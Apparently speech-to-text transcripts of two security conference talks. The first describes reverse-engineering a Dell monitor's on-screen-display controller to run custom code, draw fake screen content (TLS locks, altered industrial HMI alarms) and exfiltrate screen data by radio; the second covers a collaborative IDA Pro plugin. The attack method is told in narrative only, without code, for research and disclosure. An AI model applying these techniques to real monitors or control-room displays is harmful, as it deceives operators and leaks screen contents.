looks like code, right? Three different segments of code. Who knows what it does? Probably data, right? It's a little bit low entropy. And this thing probably looks like some sort of compressed data, so we're interested in that as well. The next obvious thing is, let's do strings, right? And we found exactly what we found, wanted to find. There's analogs. Mars, right, is the internal designation for the board class, I'm guessing. And in fact, the firmware update tool shows up with Mars.hex, which is a small driver that allows you to communicate with the board. Dell 2410. And if you look at the other commands, right, you have really cool stuff like gm-o-score OSD show and OSD hide, right? Those are exactly the kind of functions that we want to play with. So we do the next obvious thing. It's like, let's open it up in IDA, right? And IDA didn't really like it. And I don't like x86 either, that's why. You know, right? It didn't really do well with this assembly. And the reason why is because this is Turbo 186, right? Which is an 16-bit x86 system that can extend to either 24-bit, right? 24 or 20? Yeah, 24 bits for a segment select. So it does all sorts of funky stuff. And I didn't really know what to do with it. And then I Googled a little. It turned out somebody in 2008 exactly when SD Micro, bot, Genesis, and all this stuff posted on OpenRC with a very specific question about a very specific file. So I'm guessing somebody probably worked on this in 2008 and Igor wrote a very reasonable response. Like, this is how IDA works. And Turbo 186 is blah, blah, blah. Just do this. And then I looked at it, I looked at x86 and I'm like, ah, I don't want to do this anymore. I'm going home, right? Because I'm not a fan of working with x86 in general. And then a year passes because I didn't do it, right? 2016. And Jad and I were sitting around and we really, this wouldn't sit well with us. We wanted to know how the stupid computer works. We have to do x86 this time. So we're like, I don't know. I just ask, oh fuck. Ah, oh fuck. And then oh fuck didn't respond. And Igor did. And Igor just wrote this very long, insightful explanation of exactly the innards of IDA and how to do Turbo 186. And he was even nice enough to actually disassemble Mars, that hex, that IDB, just to show us that, look idiots, you could just do this. Obviously. So, you know, we did it. And if you know IDA rate, like so many segments, that's definitely not what you want to see. Like we failed. It was hard. And then. Oh fuck. And you got, please don't look at this slide. Because I basically put cross references in every function. There was no visualization. So I just added a hotkey which did in place calculations to find, do the jumps. And as documented in the G-Probe documentation we found was register read through which we can read any registers. We can put EIP anywhere we want. So definitely there is code execution. And this is one of the commands we found which is undocumented through the Dell upgrade tool, which allowed us to put shell code in the OCM, in the memory of the monitor. So keep in mind this is all just straight, standard G-Probe interface. Right? It has run code. It has read memory. It has write memory. It's all legitimate communication. We're not exploiting anything. So the next thing we say is, okay, let's write a hello world program. So we found this really cool app test, which is a way to run diagnostics. And the app test is OST file, a fill rectangle. Let's do a rectangle with color in it. That's exactly what we want to do. And then Jotun says. Let's do RAM write. Let's learn shell code and hijack it. Yeah. And then it worked, but it was really gross. And if you're a little bit hungover from last night, it's going to get worse. But this is kind of what it looked like. We had to look at this and debug it for hours and hours. And it'll make you puke. It did once. We don't know why it blinks, by the way. Yeah. Jotun, why does it? Science. Science. Right? Okay. So at this point, this is what we know about the firmware. We got it more or less disassembled. We have this range of 80000 to be 00000. And then we saw pretty quickly that there were all these little far calls to the F000 range. And we were really curious about that because that's not part of the firmware. And it's definitely something that's part of the SOC that the firmware update process doesn't even touch. So I said, huh, let's dump some data. Definitely. I have registered read. I can dump data through USB. And then he did. Dump. Wait for it. I'm dumb. It's very slow. It is like... So it's like one kilobyte every 8 minutes or something? Yeah, I was able to dump. Because every 120 bytes requires like 12 messages on the USB bus to get, right? And you can only extract up to 120 bytes. It says 127, but something weird comes out. So while these guys are doing this, I'm mucking with the hardware. So I figure maybe there's a way to do something with hardware. Maybe we can play with the GPIOs. Maybe we can exfiltrate data using something else aside from USB. Maybe we can find a GPIO that we can repurpose. So I just use everything that's available. And I flip the pins until I finally found something. I found one pin we can actually flip. There's probably more out there. We figured out there's more later. But at this point, I have one. So with one, I can do async serial or something like that. And then I can exfiltrate data at maybe like a megabot or something, which I did. And we also figured might as well just hijack the printup function and do some dynamic and have a look at what's happening in the monitor in real time and extract some strings because we had no UART by then. We couldn't find it. Maybe you guys can find it if you play with it. Maybe it's there. But at this point, we actually see some activity when we press buttons. This did not take us anywhere, but it still was worth a shot. So Fritz about literally walked off and said, like, guys, I'm just going to go reimplement UART in GPIO in this monitor. I'll be back in a day. Bye. Right? And it worked. How cool is that? OK. So we did some dumps, dynamic data coming out of the monitor finally. And we realized, also a little bit of Googling, we realized we were really wrong about what we thought about this firmware. It's not OSD firmware. That was a misnomer. It really is OCM executable. OCM stands for On-Chip Microcontroller. And it turns out there is an OSD, but inside the SOC, the OCM and the OSD are two separate computing devices. There is two effectively, two cores running. And the red part is what's called IROM. And the purpose of IROM is it's an actual ROM that sits inside the chip that acts as a driver that allows the OCM controller to connect and work with the OSD controller, which is all done through shared memory and DMA. So it's basically a tiny little network inside a tiny little I2C network on a monitor. And there are so many cool things to do in this monitor. You can do actually PIP, which is display inside itself. Like you can display two screens on one go. Yeah. And then we had that and we Google for like a million years, right? And then we find this piece of gold. It's what is it, doc88.com. It's definitely a place where you want to go to and click on links in a VM. But you should click on every single link because it's such a great website. But it does have a data sheet for exactly the chip that we're looking for. So with this chip and with this data sheet, we learned a ton about the internals and all the registers and stuff that we never thought we would find in a tiny little microcontroller inside the monitor. So with that, with the document, with physical access, with code execution, we're ready to put at least a single pixel on the screen the color we want, the location we want. So we're like, let's display a picture. The only three questions we have to ask, right? What's the first question? We have to transplant image, right? And the second question is, like, how do you display the transfer image once you get it there? And the third one. And also, what about the colors? We don't know how the colors work. Yeah. Is it like a compressed image? Is it a JPEG? What is the format of each pixel? What is the format of the image, et cetera? So we thought we would look at, if you plug the power into the monitor and nothing happens, you don't connect anything to it, the Dell logo comes up. This is kind of like the monitor's boot screen. And we saw that and we're like, well, this thing must be in the firmware, right? And after many constructive, sober and entirely productive discussions between Jada and I, we were just looking at the static stuff and Jada's like... That's obviously code. Yeah. So maybe that's a picture. Who knows? But I'm like, well, but look at all this. Like, what is that, right? Maybe that's a thing. Maybe a menu or something. Right? And if you stare at this thing for long enough, I don't know why it does this to me, but it does like crazy things that people bring. It gets you more drunk. All right. So we're doing this in Francois, right? Yeah. So these guys like to stare at things and hallucinate. I prefer to just press buttons and see what's happening. So I'm pressing buttons and I'm dumping at the same time because I have the sweet dump for now. So I'm dumping all this information, trying to compare what's happening in RAM, what's stable and what's changing to see if we can get a better picture of what's happening. So a lot of great dynamic data as things are happening, as menus are coming up and down. So then we get this, which I don't see anything in there, but Jordan's been analyzing all this information for so long and he just comes and points this to me. Francois, that was definitely a command structure. Obviously. Don't you get that? So this is a command control structure for the OSD. You can specify the coordinate system and the size of the image which you want to display. Which color do you want? And you can also compress the image and expand it in the OSD itself. So this is an adjust. It works. The OCM talks to the OSD, sends commands, sends data, send control structures and font structures. There are like three or four structures you send through DMA engine. And that's how we fixed our transfer and display image. And this is a control structure. If you pass this, you will be able to display blinking box and get epilepsy or something. But so there are two APIs which are required, which is SDRAM read, through which you can read what is in the OSD SRAM and the write API. And that's what happens. So now we're getting better at doing this. It's getting puke here. But it's still blinking. Again, no idea why. It's way to do. Yeah, it's blinking faster now. Hey, Jordan, why does it blink faster than before? I don't know how to click. And we also have no idea why it blinks. But it's really gross if you look at it. Does make you nauseous. So you see this, I'm able to move the command box now. And I was really happy. And that's weeks of work, by the way. So weeks of work and we get a pink box. We're pretty proud of ourselves here. Okay, so we got one and two down. All we need to know is how to form a picture. What is the color? How do we pack that data? We're done. We can display whatever we want. So we fill the buffer with incrementing values starting from like zero, one, two, three. And then we got that, which is definitely not what we expected. Because we were expecting maybe very slightly different colors because we're moving one byte at a time, changing one bit, really. But that's not what happened. So we looked at that. We're like, OK, we don't understand. But science time, because we're scientists. So we took a microscope and we put it right on the monitor. We're like, we're going to display a byte. We're going to look at exactly what comes out of the eight pixel. And we're going to figure this one out. We can even decode the color, get a colorometer in there, and we're just going to do it. Obviously on top of an Ida book. Yeah, exactly. That's also, and also like, I don't even, the other one. Oh, it's not as, it can't be the C book. That's gross. Okay, so I've never seen this before. And I thought that's really cool because you're literally seeing the R, right? Which is dark, the G and the B. Like those three things is a single pixel cell. And the value we put up there is all X through three, all X through three, three, three, three, three, three. So same color, same pattern. It's like, now we get each individual RGB, RGB value through this little microscope. And that's what we got. Okay, so instead of the same value, we said, OK, let's just do three, three, zero, zero, three, three, zero, zero. And this is what we got here on the microscope. So for one super amazing thing, right, that we're going to run our demo on, you win this if you answer this question, right? Okay. How many bits per pixel is it? Anyone? Six? No. Yeah. So we were putting in the word three, three, zero, zero, three, zero, zero, and we're getting this thing on the screen. Who said four bits? You got it. Four bits. Like, can you do actually do it with four bits per pixel? But I thought like in normal world, you do it with 32 bits, right? There's 8-bit R, there's 8-bit green and 8-bit blue and 8-bit alpha. So how can you encode using 4-bit? Obviously, like you have to use some kind of color lookup table and we went through the documentation. That's what they use. This is, so you get access, with the 4-bit system, you get access to 16 arbitrary 32-bit colors. So you can display any color of your choice, 16 colors of your choice, right? And zero, we found out later that it is a transparency. So where is the color lookup table on? Actually, go back. And what we found is that, okay, you can only have 16 colors, but each color is actually 32-bit deep. All right, so you can do all the colors you want. You're just limited by the number of colors you can use in any image. Okay, all right, so, cool. Let's find a color lookup table, let's modify it. Let's see if we can change the colors now. Okay? And then we're like, well, how do we do that? And then, you know, friends, what comes up? Yeah, of course, I'm obsessed, or so it seems. So I'm just, but at this point we found out there's an external SD RAM, which is like more data to dump. So I perfected the procedure and now we can dump 128 megabytes of external SD RAM and just try to see what's in there if we can find images or if we can find more. And we did continue, we all continued to work. We did see that the OCM firmware is mapped in SD RAM, so definitely it's also X186. Right? So we also work really hard while you're doing this, right, obviously. Okay, so this went on for a long time. And like two days later, we all find what we're looking for, like, oh, that's what it is. And it turns out it's exactly the same, okay? So it's the same as how the command goes from the OCM processor to the OSD. Basically there is a color lookup table that sits inside the OCM firmware. A function loads it, sets up a DMA engine, and there are four DMA engines inside this little processor, and it puts it into the SRAM and the OSD picks that up, departs it, and does its magic. Okay? All right, so this is where we went, okay? Like we actually were able to frame, like form our own image, we were able to load it and display it, put it wherever we want. So we made this cool unicorn, and instead of a rainbow, it has a tiny little SSL locks that comes out of it. Because now we can do as many SSL locks as we like, we can put it anywhere we want, and that's why this unicorn is magic. I mean, all this work for just making a unicorn fart. Yeah, but with locks for crypto, right? That's good. Okay, so at this point, you know, I'm pretty happy, I'm not working, right? It's like very late at Friday night. I go to John and I'm like, John, the SSL lock only has 16 colors, it doesn't look great, you know? We need more colors. It's so hard on, it's really hard. But we looked around and we saw that the hardware does support up to 8-bit per pixel. We, like, instead of finding this, I found a break point. So 8-bits, right, that allows you to have instead of 16, 256 colors, which is definitely enough for that SSL lock. And instead of that, I found how to put break points on the chip, and then we can do dynamic analysis and figure out, like, how every code is working. So you can also do code patch. So if we would have found this before, instead of, like, a one and a half month work, it would have been only a week maximum? Yeah, so we found this, like, when we're 95% done with this work, right? And if we use this from day one, it would have been so much less painful. But it's just we have to scroll through all the pages manually. It's not a PDF, so it loads slowly one page at a time. And you have to give them e-gold to download it, or whatever, like, Aligot or something. It's terrible. Right? Right? So we're really happy. We're like, break point for the win. We could now stop working, right? Yeah, so of course I don't drink, so I just keep working with the, and I need someone to work with. So I get some interns, and we just keep working at it until we figure out pretty much everything, except for the 256 colors. But that'll come. And at this point, yeah, I'm dumping more and more, and to the point where we actually can put an API together and get something working. So we have all the stuff that we're going to show, and some more, and to the sweet API that you can just call and show some stuff on the screen, and whatever you want to do. Yeah, so the API lets you load an image, put it to a different place. We have a really cool thing I'm not going to talk about until later, but actually it's literally the next slide. We found this really amazing treasure, okay? So somewhere deep in the code, there's this function called grabPixel, right? You know, the entire time our expectation was that the OSD's job is to put pixels on the screen, to overlay menus and whatever. But apparently it can also see every pixel, too. Why it has that power? I don't really know. It's cool. The fact that it's there means you can have a piece of software that looks at the screen and also manipulate the screen. So use your imagination, right? Maybe you can track where things are on the screen and change them dynamically. Who knows? So in the end, in review, right, we were able to change every pixel. We can see every pixel on the screen. And there's this other thing we did called Fontana. I don't really have much time to, actually, a little bit of time. So the idea of Fontana is to take software, right, and use the very ubiquitous hardware you find on all these embedded devices in order to turn those devices into data transmitters, radio data transmitters. And in this case, we adapted Francoise code. So we found a GPIO with a longer trace or a longer cable on the board, which was long enough for us to transmit something probably a few meters away. So probably outside this room or something like that. Yeah. So we're flipping just the single GPIO pin. And this is kind of cool because this is building off of the Marcus Coon stuff he did, right, from Venek freaking to doing Venek freaking on LCDs. And here, we now have the power to compute on the data on the screen and then use the screen itself to actively transmit not just the raw content of the screen, but the computed metadata that you find on the screen. And over here is a cheap TV antenna that's an intern, right? That's an SDR, and we're transmitting somewhere like 16 megahertz, right? So that's cool, too. So that code is also in the GitHub. Okay. So enough talk. We're going to... See what live demo. Run some live demos. Okay. Jaden, take it away. So this is, I think, Bonadou again. Can we put it to the TV? Okay. Give me a second. Yeah, that works. Okay. So the first attack, we call it... It's a very special attack. We call it a check attack. If you remember from our presentation, there is an area man of concern, Shiky. And so I'm going to just execute it. He promised... He made his promise that we wouldn't use this for the demo. But here it is. Yeah. Sorry. Oh, I should also explain that's a USB armory, right? With all of our POC code. It's basically running Linux, and it's just doing all the USB traffic that we were talking about before. So if you want a random guy just... Watching you? Watching you. User API, download it on GitHub. And you're getting this picture out. You can't get rid of him. He's there to stay. That's creative commons. It's out there. It's done. Let me clear this attack. It's very... All right. I'm going to do a second one. Okay. So, let me go and get a very informative discussion website. Oh, wait. Whoa. Oops. That's our next demo. Okay. Sorry. I have to... Okay, so as we all know about this... Sorry. This website, it has... It is very informative, as I have learned all these years. But it is missing... It has always missed one thing, which is DLS. Let me give it. Yeah, let John do that for you. Right. There you go. And it has DLS. Yes. Yay. Everything is secure now. Whatever you see. Everything is okay. Everything is okay. All right. Let's set up the last demo. Okay. So, this is... So, this is just a screenshot. Okay. There's no factory behind this thing. But maybe you guys are familiar. This is what a typical HMI, a human and machine interface, will look like. It's a graphical interface to something like an industrial process thing. So, you have computers controlling flow rates of tanks and blah, blah, blah. And they're all reporting back real-time status. And generally speaking, green is good, red is bad. And when you have red light on a big tank or whatever, it's probably something you should look into. And people probably freak out. So, just look at the screen. Okay. And we'll see what happens. Oh. Did you see it? Did you catch it? There you go. Right. So, instead of going after the HMI, the PLCs, the network, you know, what if you wanted to influence human behavior just on the monitor? I mean, good luck tracking that down. Right. And here it is. Right. So, that's our demos. No, wait. We have one more to that. Oh, that's right. That's right. Yeah. Oh, that's just for fun. That's our proof of concept. We just put it in there. Right. Oh, it's the unicorn. Demands obedience. And we got it wrong the first time. You can see, like, the image is not square properly. Yeah, this is a proof of concept. It's the first one. Okay. So, you know, let's talk a little bit about implications of this thing. You know, how big is the problem? Okay. So, we actually had some folks look into the business end of this. And we estimate that over the last 10 years, we've made over a billion monitors. Right. And I would guess, you know, by and large, the majority of the monitors that we have work in some way very similar to this Dell monitor. In the sense that it has an OSD controller, it could put a menu thing on the screen. And it runs software, right. That drives that system. So, yeah, pretty much every one of your monitors is probably vulnerable to this or some variant of this today. Right. That's a problem. And, you know, how practical is this attack for, you know, how practical is the tax vector? So, if you notice, the way we did this attack, we had to physically plug in a USB cable, right. And that's how the USB to I2C interface worked. But keep in mind, the one, the DDC2BI and the DDC commands were originally designed to be able to go back over all of the data channels, including VGA and HDMI. So, there's also a possibility that that command can go through that data channel. And also, right, as soon as you have access to the I2C bus, right, even if you didn't have a legitimate, you know, bridge that got you there, however you got, however you get there, as long as you're on the I2C bus and you're working with something similar to this, right, you should be able to, you know, do something like what we've done here. And if you notice the very modern, the very new, you know, 34-inch curve monitor with the USB to I2C solution, right. I mean, that tells me that maybe the board is not exactly the same, maybe the firmware versions are different, but today we're still using this methodology of, you know, getting some bridge to talk to I2C in order to talk to these on-screen controllers to do something like a firmware update. And so, here's the big one. How realistic would the fix be if there was a fix? You know, I thought this went through a little bit, right. So, in order to fix this thing, you either have to do something like a physical recall of, like, a billing monitors, which is never going to happen, or you're going to have to release a software update to fix the issue, which means probably you're going to have to do something similar to our, you know, our path, right, or you're going to have to release the firmware update process, right, to all of the users of the world, which will actually help the adversary, the bad guys, faster than it helps the good guys, right. Because, you know, the reason why we can't do this on a hundred different models today is because we don't have a hundred monitors. But if you release the way, you know, firmware update is done on everything, then that's probably not good. So, the way we fix it is going to be slightly tricky. And we haven't put the code up on GitHub, but we're going to not be lame. We're actually going to do it today. So, that's supposed to be a link, but we're definitely going to do it. And this is like, you know, like Francois said, all of the code that we came up with, all the code that, you know, ran in this demo, and a lot of documentation of the APIs that we found, you know, ways of using graphics, so ways of displaying images, and ways of doing Fontana and all that stuff. You know, so lastly, right, please contribute if you like this work, you know, take apart your monitor, take apart your friends' monitors, right, see what's inside. Because, you know, this is one data point, and obviously there are thousands of different manufacturers for monitors, and probably tens of thousands of different firmware versions, blah, blah, blah. But, you know, if we started getting more data points, we'd probably get a better idea of, you know, how widespread this type of attack can be. And, you know, lastly, right, like we're now entering a time, you know, where we probably have to dial the pixels coming out of our screen, as just yet another security problem we have to worry about, right, and that's not great. So, you know, if we can come together and try to fix this problem in some tangible way, that would be most excellent. So, in conclusion, right, there are happy endings to the story. We spoke to Dell, and as of yesterday, Dell has not released a security update to fix the shack attack, so that's still going to happen. And many monitors were harmed in the making of this presentation. And, but the happy ending is that Chris now lives happily with his semi-unmodified 34-inch monitor. So, he got that one. Now, that's not dead. So, that's it. Questions? Yes. Oh, yo, hi. Yeah, thanks for the picture. We never met, you totally just made that one up. Sorry. Yeah, first question. How much alcohol was consumed during your work? John, what do you think? How much alcohol is consumed during the making of this presentation? 25 bottles of wine. I don't know. I would say that. Two bottles per day? We don't, you know, it's, it clearly got the job done, so we're good. Yeah. Yeah, and second, you mentioned that you have to use USB, but did you look into, like, using just the video card to talk directly to DC? So, that's the next thing that we would look into? We started to look at it, actually. Yeah. We didn't get a chance to finish it. So, yeah. That's a big open question, right? And I, like I said, you know, any peripheral on the monitor that gets you onto the I2C bus, no matter what way you do it, right, will probably be able to get you to this goal. Any other questions? I guess let's drink. Yeah? Okay, we're done. Thank you. Thank you. Thank you.
|
There are multiple x86 processors in your monitor! OSD, or on-screen-display controllers are ubiquitous components in nearly all modern monitors. OSDs are typically used to generate simple menus on the monitor, allowing the user to change settings like brightness, contrast and input source. However, OSDs are effectively independent general-purpose computers that can: read the content of the screen, change arbitrary pixel values, and execute arbitrary code supplied through numerous control channels. We demonstrate multiple methods of loading and executing arbitrary code in a modern monitor and discuss the security implication of this novel attack vector. We also present a thorough analysis of an OSD system used in common Dell monitors and discuss attack scenarios ranging from active screen content manipulation and screen content snooping to active data exfiltration using Funtenna-like techniques. We demonstrate a multi-stage monitor implant capable of loading arbitrary code and data encoded in specially crafted images and documents through active monitor snooping. This code infiltration technique can be implemented through a single pixel, or through subtle variations of a large number of pixels. We discuss a step-by-step walk-through of our hardware and software reverse-analysis process of the Dell monitor. We present three demonstrations of monitoring exploitation to show active screen snooping, active screen content manipulation and covert data exfiltration using Funtenna. Lastly, we discuss realistic attack delivery mechanisms, show a prototype implementation of our attack using the USB Armory and outline potential attack mitigation options. We will release sample code related to this attack prior to the presentation date.
|
10.5446/32748 (DOI)
|
This morning we have a talk on collaborative solution for Ida to start things off. So thanks everyone for making out here last year recon. So solidarity. Who are we? My name is Marcus Gadsdalen. I'm a security software engineer at Microsoft. And I'm Nick Burnett and I am currently a student at RPI. So if you don't know already, this talk is almost purely about Ida. Ida Pro, if you don't know, it's a disassembler as developed by Hexraiser here somewhere. So I'm sure all of you know what it is. You probably all have a license, hopefully. So just to give some background on our project and the history of collaborative reverse engineering in the context of Ida Pro, we have a little timeline here. I don't want to go into the specifics of the individual projects too much because this is only a 30 minute talk. So way back in 2005, we first saw Ida Sync by Pedram. That was a very simple solution. You guys can Google some of these if you want. It's pretty interesting to look back on history. Collaborates one that everyone probably knows and talks most about. They're all like, hey, you know that one Ida syncing solution that was really crappy and crash all the time? That was Collaborate. That was by Chris Eagle and Tim Beatus, I think, right? So what's interesting about these two projects though is that this was way back and these projects were attempting real time syncing. They were kind of what we call a push-based model. But then we started seeing other solutions coming through such as Bincrowd and CrowdRE, Ida Toolbag, Ida Syncerty. And all of these solutions were pull slash version control, SVN, Git-based. You would commit or you would push your changes up by hand and other people would have to pull them down by hand. And it was very strange, you know, kind of what happens here. And I like to say we stopped dreaming, right? But it also might have been the fact that Ida wasn't quite ready. Ida API wasn't in a place where it could support real time collaboration. Well, real time event capture to the degree that was needed for accurate event syncing or how developers would need it. So version control, you know, now talking about why version control was bad is, version control is a medium to document the process of creation, right, for source control. You're developing code, you're writing code. But reverse engineering is an exercise in discovery and digital cartography, right? You're trying to understand what this binary is, what this blob is. You're trying to document it. You're not writing code. You're not developing a system. So, you know, pull and version control SVN get that seemed very strange for a medium of, you know, storing and maintaining notes and whatnot. So here we are at recon 2016 and we are unveiling Solidarity, a personal project that we've been working on for about a year. Year and a half. Yeah, about a year since about last June. So, Solidarity. We started off with these initial goals right here. You know, four key kind of central goals was we want to sync out of databases in real time, right? We play lots of CTFs. We're very fast paced. We, you know, we need to be able to share information instantaneously. And we also want to say, hey, can we sync X-rays in real time too? You know, that was something that collaborate. There is no way collaborate would be able to do that. CrowdRE kind of touched on some of that stuff a little bit. But then again, there also was more of a kind of a pull based model. And then I said, I want user cursors to dance on Ida's nav band. So, Ida's nav band is the thing on the top of Ida. If you've seen it, it's always usually blue or whatever. Most people just ignore it. But I was like, I want to see multiple users working on the same database and I want to see where they are in the database on that nav band. And then the last point was it has to work, right? I don't want another tool that, you know, kind of half works and doesn't and whatnot. So, we started out, you know, we took the first goal. This is June last year. And this is a little gif of it. You see very quick demo. It worked then. It was just a very simple demo, a perfect concept. You know, we sat down really in a couple hours like, oh man, like, you know, this is like syncing atomic user actions between databases. We're just like renaming a function call here. And we're like, wow, that's so easy. We'll be done by Defcon finals, I said. That was June 2015 and we are still working on this. So, you know, the first attempt was very simple. You have two Ida Pro instances or solidarity clients as we'll call them for now. This was like the one of solidarity. We've gone through probably about three huge architecture overhauls. And so syncing atomic user actions between databases that is actually really easy. If you put in some time and effort. But then, you know, and this is just between two databases, two users, right? You just both load the same database and both are like, all right, let's type in each other's IPs and connect. And, you know, that wasn't hard. But there is a lot of added complexities. You start to realize that, okay, you don't actually want to sync databases. There's a lot, a lot more. Like, how do you ensure that everyone starts out in sync, right? So, you just have this very simple idea of if we just sync every event, everything will be okay. But how do you even make sure that everyone is on the same page before you start syncing events, right? So, people are going to be going to sleep waking up like during CTS, like having different states of their database, you know, you need the same base to start from. And so, that's just one thing. Coordinating and routing multiple sessions at once. What if you want multiple people working on different challenges at the same time across the same server? What if they're, you know, how do you have like five people working on the same binary? You can't really do that with the, you know, that single pipeline we had before. And then capturing only the correct database event. So, Ida's notorious for its auto analyzer, at least in this space of... Collaborative. Yeah, of collaboration. Almost every project is struggled with the auto analyzer because the auto analyzer is kind of like a one-way hash function. Like, you say, hey, define a function here and it will go through your database and just start modifying the database and doing all this crazy stuff and there's no way to go back. And that's why there's no undo. You only go forwards. And so, a lot of people struggle to actually differentiate between what the user is doing and what the auto analyzer is doing to the database. So, you know, in our naive initial attempts, we had no idea about the auto analyzer and all that crazy stuff. And so, that was one of the big issues that we had to work through and that everyone else that has worked in this space has had to work through. We've come up with some good solutions, but we'll get to that in a little bit. So, what happened is this project ended up evolving into more of a... We recognized that we needed a platform to build this collaborative environment that we were seeking for CTFs. And instead of just trying to sync information and data and events between databases, we wanted a platform that you could really work together on. And so, this became a platform to enable Ida interconnectivity. And so, we're going to give a brief kind of high-level overview of the architecture that then zooms down. So, you know, you just have a basic central server and client kind of model going on, right? All your Ida clients phone into the server and the server bounces everything and routes traffic accordingly based on different sessions that are going on. And all that, you know, there's nothing too crazy there. But then we start to get to kind of what we actually call the platform. So, you have two major components to Solidarity. You have the client and the server halves. And so, this is kind of the relationship we see between the two halves. So, you have your client operating system, you know, you could be Windows, Mac, whatever, running Ida Pro. And then you have a server OS. We've mostly been using Ubuntu. But it's just essentially we have a twisted, a Python twisted... I have for networking. Yeah, we'll talk about it in a second. Yeah, on the server. We'll get there. And then... And then often on top of these, the server and the client were able to extend them with modules. So, yeah, this is, you know, so we have in the plugin, which is built on top of Ida Pro, which is what we call the Solidarity client itself, and then the Solidarity server. And this whole get up right here is the platform. But then what we do is we actually build modules on top of the platform. So, it's... we actually made an Ida plugin that then has plugins. So, it's kind of funny. And the server has equivalent plugins on its side. So, it's a very interesting modular framework that, you know, you'll see some cool stuff here. So, going into a little bit more detail about the client here, it's written in Python entirely. We actually had to extend Ida Python and flush it out a lot early on, because the event handling stuff was incomplete when we started last year. Now, I think as of 6.8 and 6.9, it is more complete, or if not finished at this point. So, the plugin, the client plugin is entirely in Python, which is different from Collaborate to the past projects, which were built in C. And we actually use... the client is using the Actor programming pattern, if you guys know about that. And it's specifically using the Python library. And so, the Actor programming pattern essentially is... it takes up things into all these different little nodes or modules, and these modules communicate with each other. They pass messages between each other and act on these messages. And so, you know, we have a core kind of module, and this kind of helps load and organize all the other modules, and all these modules can pass messages to each other based on their needs and what they're interested in doing. And so, it's pretty sweet. It's all asynchronous, nothing blocks anything else. And then there's more modules. So, on the server side of the deal, we have... also, it's written in Python, but it's using Twisted, async.io through Twisted to do the networking event loop and to keep things from blocking that way. And so, we can handle all the different clients coming in and route the events, basically. And for the database model, we're using SQL Alchemy to do the... like make the actual ORM modeling. And then, so the purpose of the server to route between clients, obviously, but then we also implemented a user management system and a web server to help you sort of like manage the entire system better, and we'll see that a little bit later. Yep. And also, just something that's kind of funny to note is that all of the network communication is over TLS 1.2, and we're like, oh, we should, you know, put a little option there to like make it optional. We're like, oh, no, in the spirit of good security, let's actually force that on so you can't turn that off. So, yeah, we actually, you know, try and instill some good security standards here. So, let's start talking. Let's get into... this is... we don't have a live demo. We have lots of really cool GIFs for you guys, which is basically our demo. So, let's start talking about the modules that extend the platform, you know, that really make up the core of what you guys care about, you know, the syncing and all the really cool stuff. So, the first thing we really needed once we had, you know, kind of established the platform was some way to correlate, you know, these users in these sessions and binaries. So, if you have a binary, right, you need... you want to have like five people working on this binary. So, you know, we basically kind of call this a project. And this is, you know, what becomes the foundation for collaboration. And so, the projects module offers a few features. So, even if you don't want to necessarily work in real time with other people, you might want to share databases with other people. So, the projects module offers minimal functionality of... you can easily upload databases, download databases to the server, and it provides a very easy way within Ida to access and push and like pull databases super conveniently. It's no longer like, hey, what's your IP? Let me netcat my IDB to you. You can just do all this directly from within Ida. So, this is a little demo of it. And so, we're able to, from within Ida, actually go and create a project through this GUI. And we can actually... there's this entire directory structure that we can go in and create new directories and projects in. And then from there, actually upload the database that we're working on right now so that other people can then use it once it's been uploaded. Yeah. And so, you can specify some details about the project or about the IDB so that other people can see it. And then we just upload it right to the server. And it will become instantly available to everyone else who's using the platform. And then, yep, and then to show the analogous of this, the next one we are downloading and opening. So, we have a blank Ida instance and we're going to open from the server directly. Yep. So, here's, you know, a user. I just uploaded something. Someone else is like, all right, hey, I'm going to grab it and, you know, join you. And so, this downloads. And so, now, you could very easily access someone else's IDB that they wanted you to get without having to do anything too complicated and directly from inside Ida. Yep. So, I mean, you know, even without talking about syncing events and, you know, all this and that, we're already, you know, starting to see some great solid, you know, collaboration opportunities right here. But just, you know, the ease of being able to share databases across, you know, anyone that has access to the server, so, like, you know, a CTF team or an instant response team inside some company. Yep. Super convenient. Okay. And I quickly just mentioned users. Yeah. Let's see. Yeah. Okay. Yeah. So, because you might have sensitive IDBs and stuff, we've implemented a system so that you can either have open projects or public private projects or private projects so you can add users to private projects and only they can access it. Just as a protection in case you have sensitive stuff inside your company that only certain people can access and so on. Yep. So, just some basic permissions. All right. So, now, we'll talk a little bit about real time, you know, what a lot of you probably care about. Database event syncing, right? Yeah. So, this is just some more trivial syncing. So, we have two different ID instances here, Bulford connected. You can imagine that they were on different computers, but it was easier this way. Yeah. And so, we're able to do all kinds of different operations in IDA and they will be directly synced between both users in real time. So, yeah, we're just doing some basic renames in this one. Here, we're going to change an operand. So, we change that to 20. You can see these on both sides. So, this is what we call more of the easy syncing JIF. Yeah. Because these are pretty simple operations. They don't have any side effects really. Yeah. They don't tap IDA too heavily. So, this is, you know, stepping up a little bit more. This is like structure creation and changing the types of the different fields and structures. This is a little bit more interesting, a little bit more out of the norm. Very useful though, because structures are often very useful to have for reverse engineering. So, it's great to be able to share them in real time with people working on the project with you. Yep. So, this is just structure creation, you know, defining some fields, renaming some stuff. It's all very quick. We'll just let this play through. How are we doing on time? Oh, we're doing good. We're doing good. So, yeah, pretty cool, pretty convenient. Changing some types on the fields. And I think we end up actually delineating it entirely just for fun. And it's gone. Yeah. Cool. All right. And then something a little bit more advanced here is we're actually going to engage the auto analyzer a little bit by undefining functions. You see both sides have undefined them the same way. So now we can go back and start redefining code and let the auto analyzer do its stuff. But you see they're still able to sync the same events even though Ida is creating a ton of actions that it's doing to its own database. So now we're starting to undefine and define selection of bytes, which is also a little interesting. It's different. Undefining and defining selection is actually different from just hitting U and like undefining, you know, from where you are downwards. So, yeah, it's cool. You know, we're screwing up all the code here, but it's in sync, right? That's what we care. We're trying to minimize divergences as much as possible. So, yep. So that was a little bit more advanced. So, anyway, some of the secrets for the event syncing that a lot of people have circled on. I wanted to put more slides in here, but I ran out of time. So you only get one slide of some of the secret sauce is you have to really respect Ida's auto analyzer. So it might not have been the best design decision way back. I know I've seen Ilfalk talk about how way back in the day they were hoping to have an AI built into Ida to help, you know, assist you with reverse engineering and whatnot. And so it's, you really have to respect it and, you know, don't mess with it. Like when it needs to do stuff, you let it do stuff and you back off. And so the other, you know, the other super secret hint is hook and utilize the cute subsystem. Like it is there for the taking and you can do almost anything you want to Ida. Few people realize that but Ida is so, so customizable. You could change just about any aspect. If you guys have seen some of the crazy Ali, like Ali, you know, customizations people have done for Ali debug and whatnot, like crazy menus and whatnot. Like you could do the same exact thing with Ida. Few people actually utilize Ida's API or it's, you know, the power of the QT subsystem. So also the last point is providing context to the signals and hooks and events that you use are that are made available in Ida. Collaborate in some of the other projects just captured them and broadcasted them. But the thing is some of 